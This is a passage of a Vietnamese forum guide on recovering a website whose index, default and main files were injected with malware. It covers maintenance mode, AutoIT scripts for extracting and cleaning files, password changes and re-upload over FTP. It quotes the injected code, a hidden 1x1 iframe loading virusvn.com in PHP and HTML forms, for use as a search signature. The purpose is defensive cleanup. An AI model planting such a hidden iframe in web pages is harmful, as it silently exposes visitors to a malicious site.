- Trong trường bạn không thể điều hướng tên miền đi nơi khác, hãy đưa hệ thống vào trạng thái bảo trì với cảnh báo tương tự ở trên. Nếu không thể shutdown hệ thống từ giao diện web, hãy tiến hành cập nhật lại file index thông qua FTP account, bằng cách tạo trước 1 file index.php, xong đổi tên file index, file default, file main hoặc bất kỳ file nào mà bạn dùng để nạp trang chủ của website, cho nó thành 1 tên khác rồi up file index.php mới tạo lên. Lưu ý với cách này mã độc trên web vẫn được thực thi khi người dùng truy cập đến, cho nên trong thông báo bạn phải nói rõ để người dùng có sự phòng vệ kịp thời. Nếu kg nói rõ có khả năng rất lớn người dùng sẽ có ác cảmvới domain của bạn nếu mã độc gay hại cho người dùng.
- Có 1 cách khác nhanh hơn, giành cho những web có thể truy cập qua nhiều file tại webroot, ví dụ như với trường hợp của Forum phpBB, không chỉ có index.php ở webroot mà còn có cả memberlist.php, search.php,.... cách đó là đổi tên thư mục webroot, sau đó tạo 1 cái khác giống với tên củ rồi up file index.php mới lên việc này hoàn toàn có thể làm được nếu bạn đang dùng dreamhost vì cấu trúc thư mục web của nó giống với sơ đồ bên dưới.
----------> Bổ sung bài viết lúc 17:15 <----------> Bài viết trước lúc 17:09 <----------
1. -- root
2. -- -- [ ftp account name ] <= bạn sẽ ở đây khi login ftp account
3. -- -- -- [ tên domain ] <= đây là webroot, hãy đổi tên thư mục này
- Nếu tài khoản FTP của bạn không thể sử dụng được, thì buộc bạn phải truy cập vào cpanel trong qua giao diện web của Trang Host Chủ, lưu ý bước này mà không có trình Anti bảo kê thì 70% bạn bị mất luôn pass với Trang Host Chủ, do đó chưa cài Anti với chức năng Quét Theo Thời Gian Thực đã được kích hoạt thì đừng có dại mà log vào, trừ khi bạn có di động truy cập vào web được thì hãy đổi pass trên di động ngay khi đã login xong, nhớ ghi lại pass mới ra giấy nhé, vì rất dễ quên mất trong lúc dầu sôi lửa bỏng thế này, xong đâu vào đó rồi mới tiến hành cập nhật file index.php.
5. Chế tạo vũ khí
=> Kết quả của bước này là tạo ra những file sạch thế chỗ cho những file bị nhiễm độc
- Ở bước này phải bảo đảm Trình Anti đang quét toàn bộ hệ thống và chức năng Quét Theo Thời Gian Thực đang được kích hoạt. Việc cần làm là tải toàn bộ file của Website về lưu vào ổ đĩa không bị đóng băng bởi Deep Freeze thông qua tài khoản FTP bằng một ứng dụng thứ 3, không sử dụng giao diện web của Trang Host Chủ để tải website về nhé. Nếu chưa có ứng dụng loại này thì bạn có thể Tải FileZilla về sử dụng, nó miễn phí và khá tốt.
- Nếu bạn dùng trình Anti Avast được thì rất có lợi cho thời gian tác chiến, vì nó sẽ vừa quét toàn bộ hệ thống, vừa kiểm tra những file được tải xuống và nếu có file nào bị nhiễm mã độc nó sẽ lên danh sách. Khi quá trình tải website đang được thực hiện cũng như khi nó đã kết thúc bạn có thể lấy danh sách này cách bấm vào Hiện Tập Báo Cáo , như hình bên dưới.
- Tới đây tớ xin nói 1 tý về quy tắt mã độc được chèn vào website. Theo như tình huống mà tớ gặp, những đoạn mã đó chỉ nhằm vào những file có tên đại loại như là index, default và main để thường trú. Như vậy có 2 vấn đề cần được giải quyết ở đây, đó là trích lọc bằng cách nào và làm sạch những file bị nhiễm ra sao , 2 việc này phải thực hiện sao cho hiệu quả và nhanh nhất có thể, sau đây là cách mà tớ đã dùng.
----------> Bổ sung bài viết lúc 17:22 <----------> Bài viết trước lúc 17:15 <----------
a. Trích lọc không chỉ đơn giản là dựa vào danh sách bị nhiễm để copy từng file ra, vì nội chuyện lựa được chúng ra trong cả ngàn file của website thôi cũng đủ mệt, chứ chưa nói gì đến trở ngại khi tải chúng lên website trên internet vì mỗi file nằm ở những thư mục khác nhau, để nhớ hết không phải dễ, nếu số lượng file bị nhiễm lên khoãn 20 thôi là đủ chết người rồi, thực tế tớ đã phải cập nhật lại cho gần 100 file khi Forum bị nhiễm.
- Giải pháp của tớ là dùng một đoạn mã AutoIT tự động hóa việc này, sau khi thực thi đoạn mã đó, ta sẽ được một cây thư mục có cấu trúc giống cấu trúc thư mục của website, với các file bị nhiễm nằm đúng chỗ của chúng, lúc cần up lên website chỉ cần up thư mục góc thôi... rất nhanh, khi đó những file đã làm sạch sẽ được ghi đè lên những file bị nhiễm trên website. Đoạn mã này sẽ sao chép những file có các chuỗi index, default hoặc main trong file name với các phần mở rộng là html, htm hoặc php ra và để trong 1 thư mục có tên là new , nếu file bị nhiễm của bạn không thuộc những trường hợp trên thì phải nâng cấp mã nguồn của nó lên, để nâng cấp bạn phải có kiến thức cơ bản về lập trình và 1 ít hiểu biết về AutoIT.Ở đây tớ kg hướng dẫn cách nâng cấp file AU3 này chỉ nói cách sử dụng:
*. Đầu tiên là đổi tên thư mục webroot chứa các file của website trên máy tính thành www
*. Sau đó chép đoạn mã AutoIT hoặc file exe của nó vào cùng chỗ với thư mục chứa các file của website mà bạn đã đổi thành www ở trên, kết quả cuối cùng là bạn có là cấu trúc thư mục tương tự như bên dưới:
== D:\
== == [www] <= Thư mục chứa file của website
== == FindIndex.au3
== == FindIndex.exe
*. Xong ta kích cho đoạn code chạy, khi thấy thông báo Tìm được: ?? tức là quá trình sao chép đã hoàn tất, danh sách file đã sao chép sẽ được lưu trong file re.txt cùng thư mục.
*. Số lượng lấy được thường sẽ nhiều hơn số lượng bị nhiễm, như vậy thì tốt kg sao cả, nhưng nếu ít hơn thì bạn phải xem lại trong danh sách bị nhiễm để nâng cấp file FindIndex.au3 lên.
b. Vấn đề còn lại là bảo đảm file được trích lọc phải hoàn toàn sạch, không có mã độc. Nếu bạn trích lọc từ các file vừa tải xuống thì hầu hết bọn chúng đều bị nhiễm. Nhưng nếu bạn có lưu dự phòng website thì sẽ đỡ vất vả hơn rất nhiều, hãy thực hiện lọc file bằng code AutoIT FindIndex.au3 trên thư mục dự phòng. Rồi mang thư mục new có được đi kiểm tra lại bằng các bước tiếp theo:
- Lấy đại 1 file bị nhiễm nào đó từ những file trong website mới tải xuống, dùng notepad mở ra tìm đến đoạn mã độc, nó thường nằm ở cuối file, có dạng tương tự như code bên dưới.
Bài viết được đăng trên trang web hocautoit.com, mong đọc giả vào xem để ủng hộ Anh Em trong Forum viết tiếp.
+ Mã đọc trong file php có dạng:
echo "<iframe width='1' height='1' style='visibility:hidden;' src='http://virusvn.com'></iframe>" ;
+ Mã đọc trong file html và html có dạng:
1. <iframe width = '1' height = '1' style = 'visibility:hidden;' src = 'http://virusvn.com' > </iframe>
- Tới đây bạn phải tiến hành xóa mã độc đi khi đã nhận dạng được chúng, nhưng nếu file được lấy là từ thư mục dự phòng thì bạn có thể chuyển sang thao tác kế tiếp. Trong thao tác này, nếu số lượng file ở thư mục new ít, vào khoãn 10 file thì bạn có thể xóa mã độc bằng tay, nhưng nếu nhiều thì bạn lại phải dùng code AutoIT khác là DeleteCode.au3 , cách dùng code này như sau:
*. Cũng chép file DeleteCode.au3 vào chung chỗ với file FindIndex.au3.
*. Lấy chuỗi mẫu của mã độc trong 1 file có phần mở rộng làhtml, htm hoặc php gán vào biến $Code của file DeleteCode.au3, chú ý sử dụng dấu nháy kép [ " ] để tạo chuỗi,không dùng dấu nháy đơn [ ' ],nếu trong mẫu mã độc cũng có sử dụng dấu nháy kép [ " ] thì bạn phải thế dấu nháy kém đó bằng biến $c, như trong ví dụ bên dưới.
$Code = "echo " & $c & "<iframe width='1' height='1'style='visibility:hidden;' src='http://virusvn.com'></iframe>" & $c & ";"
----------> Bổ sung bài viết lúc 17:27 <----------> Bài viết trước lúc 17:22 <----------
*. Sau khi gán chuỗi xong bạn phải kích code 2 lần, 1 lần cho mẫu code độc trong các file dạng html và htm, lần còn lại cho mẫu trong các file dạng php, vì chúng có cấu trúc mã độc khác nhau. Ở đây buộc bạn phải nắm được những kiến thức cơ bản của ngôn ngữ HTML và PHP mới có thể xử lý chuỗi tốt được.
- Tiếp theo dùng một trình tìm kiếm văn bản nào đó để thực hiện việc search trên toàn bộ file của website với từ khóa là địa chỉ trong phần src của mã độc, trong ví dụ trên là virusvn.com , nếu không có src bạn có thể dùng bất kỳ chuỗi ký tự nào mà bạn cho rằng nó là đặt trưng của mã độc. Không nên dùng chức năng tìm kiếm có sẵn trong Window, vì nó rất cùi bắp không ích lợi gì, nếu chưa có trình tìm kiếm nào ưng ý bạn có thể Tải Effective File Search về dùng, đây là cái mạnh và nhanh nhất mà tớ biết, nếu kết quả là không tìm thấy file nào mang đặt trưng của mã độc trong thư mục new tức là nó đã an toàn, để bảo đảm hơn bạn có thể mở 1 hoặc 2 file bất kỳ ra kiểm tra.
- Khi thư mục new đã hoàn toàn sạch, bạn cần làm 1 thao tác kiểm tra khác, đó là sao chép thư mục website vừa mới tải về ra thêm 1 bản nữa để dự phòng,do việc này có thể mất từ 15 đến 20 phút nên ta hãy thực hiện ngay khi quá trình tải website về hoàn tất nhằm rút ngắn thời gian tác chiến. Sau đó bạn sao chép cấu trúc thư mục website trong new và đè lên cấu trúc của website mới tải về, việc này nhằm mục đích giả lập thao tác ghi đè khi ta làm thật với website trên internet. Rồi thực hiện lại bước tìm kiếm đặt trưngcủa mã độc ở trên với thư mục mới tải về của website đã ghi đè bằng thư mục new, thao tác này để kiểm tra xem đoạn code AutoIT FindIndex.au3 có trích lọc xót file bị nhiễm nào hay không.
- Nếu quá trình tìm vẫn còn thấy file bị nhiễm, thì bạn phải lấy file đó ra bỏ vào đúng vị trí của nó trong thư mục new và tiến hành loại bỏ mã độc, nếu số lượng bị xót là quá nhiều có thể bạn phải tiến hành nâng cấp file FindIndex.au3 và làm lại từ bước lọc file cho thư mục
----------> Bổ sung bài viết lúc 17:36 <----------> Bài viết trước lúc 17:27 <----------
website mà bạn vừa dùng new đè lên. Chỉ khi nào kết quả tìm kiếm không cho ra file nào nữa thì có nghĩa rằng bạn đã có được thư mục new hoàn toàn sạch và đầy đủ những file cần thiết, sẵn sàng để úp lên website thật trên internet.
=> Có thể bạn sẽ thắc mắc rằng tại sao đã quét những file đang tải xuống bằng Avast rồi còn phải search đặt trưng của Mã Độc làm gì, hoặc ngược lại nếu có thể quét đặt trưng của mã độc bằng Effective File Search thì tội gì phải dùng Avast làm chi cho rắc rối. Theo tính toán của tớ thì thời gian thực hiện 2 công việc này cộng lại cũng bằng thời gian thực hiện 1 trong 2 công việc, vậy tội gì mà không dùng cả 2 cách để tăng độ an toàn. Hơn nữa chắc gì cách dùng Effective File Search search đặt trưng có thể tìm được tất cả file bị nhiễm, mà nếu kg search theo đặt trưng thì lấy gì bảo đảm quá trình làm sạch code không bị xót file. Và chỉ cần bỏ xót 1 file thôi, sự lây nhiễm có thể bị lặp lại trên toàn hệ thống cũng như trên máy tính bạn.
[color=6. Củng cố phòng tuyến][/color]
=> Bảo đảm cuộc tấn công giành lại quyền kiểm soát website trên internet phải thành công.
- Khi đã có thư mục new , bạn có thể yên tâm rằng con bot thứ nhất (spyware,malware) sẽ không tấn công vào thư mục này vì đó kg phải là chức năng của nó. Ở bước này chúng ta sẽ kết thúc những gì đã bắt đầu ở bước 3, hãy đợi cho trình Anti hoàn tất việc quét toàn bộ hệ thống, cách xử lý tốt nhất với những file bị nhiễm được trình anti tìm thấy trên các ổ đĩa là xóa toàn bộ. Nếu những file bị nhiễm ở bước này nằm trong thư mục new thì bạn nên kiểm tra lại xem tại sao nó còn trong danh sách nhiễm, nếu đúng là còn xót mã độc trong đó thì hãy tiến hành làm sạch bằng tay.
- Khi đã hoàn tất việc quét, bạn không nên khởi động máy tính lại nếu đang ở trạng thái đóng băng (Frozen), cho dù là trình anti có kiu bạn làm như vậy. Lúc này máy tính của bạn đã được an toàn, vấn đề tiếp theo là tạo sự phòng thủ cho website ở trên internet, bằng cách đổi tất cả mật khẩu tài khoản FTP, tài khoản Host, còn đối với địa chỉ mail bạn đùng để đăng ký tài khoản Host thì không nên log vào, trừ khi bạn chắc chắn rằng nó đã bị lộ trong quá trình máy tính bị nhiễm. Nếu có di động cóthể truy cập web, tốt nhất nên dùng nó để đổi, vì như vậy an toàn hơn nhiều, dù rằng toàn bộ máy tính đã được quét.
- Khi các mật khẩu đã được thay đổi, hãy tiến hành khởi động lại website, điều hướng tên miền về chỗ củ, nếu bạn dùng cách đổi tên thư mục webroot thì hãyđổi lại, còn nếu dùng cách thay thế file index thì không cần làm gì cả. Lưu ý là không nên truy cập vào website khi không cần thiết, kể cả khi bạn đã shutdownwebsite từ giao diện web (Site maintenance: offline) thì cứ để như vậy kg cần thay đổi, bạn cũng đừng lo lắng vì trình Anti sẽ bảo vệ bạn, nếu nó không thông báo gì khi bạn truy cập vào trang bị nhiễm độc thì hãy xem lại, có thể bạn đã chọn nhằm trình Anti, điều này có nghĩa rằng bạn phải làm lại từ bước đầu tiên.
----------> Bổ sung bài viết lúc 17:44 <----------> Bài viết trước lúc 17:36 <----------
7. Tấn công tiêu diệt địch
=> Tiến hành loại bỏ mã độc trong website trên internet để chiếm lại website.
- Khi mọi thứ đã chuẩn bị tốt, hãy vào cpanel của host ngắt toàn bộ kết nối của các tài khoản FTP để làm gián đoạn những đợt tấn công của con bot đang up mã độc lên website trên internet. Nếu bạn đang dùng dreamhost thì hãy vào Users => Manage Users => Kill FTP Connections để thực hiện, còn với host khác thì tớ không chắc là có chức năng này không.Bên dưới là hình mình họa, Bài viết được đăng trên trang web hocautoit.com, mong đọc giả vào xem để ủng hộ Anh Em trong Forum viết tiếp:
- Sau đó liên tục connec vào tài khoản FTP, đợi khi kết nối thành công hãy up cấu trúc thư mục website trong new lên thông qua FileZilla hoặc bất kỳ chương trình FTP Manager nào cũng được, không sử dụng giao diện web trong cpanel và cần lưu ý rằng phải tìm đúng vị trí webroot trong thư mục New cũng như trên internet để up, nếu vội vàng ở bước này thì"Con trâu què của bạn có thể thành trâu chết".
- Sau đó truy cập vào web, dùng các cách kiểm tra ở bước 1 để xem website còn bị nhiễm mã độc không và cách 5 phút thì kiểm tra lại 1 lần, nếu vẫn bị tái nhiễm thì có những khả năng sau:
1. Bạn quên đổi pass hoặc quên ngắn kết nối của 1 tài khoản FTP nào đó.
=> Hãy tiến hành đổi pass lại cho tất cả tài khoản FTP và ngắt kết nối của chúng.
2. Máy tính của bạn chưa thoát khỏi con bot thứ nhất.
=> Bạn phải đổi trình anti khác hoặc đổi 1 máy tính khác rồi thực hiện lại bước 6 7.
- Chỉ khi nào sau 10 đến 20 phút kể từ khi bạn up lên mà không xãy ra hiện tượng tái nhiễm thì lúc đó bạn có thể ăn mừng chiến thắng. Lúc nãy hãy đi dọn dẹp những file index mà bạn đã đổi tên, vì chúng có thể còn mã độc trong đó.
Last edited: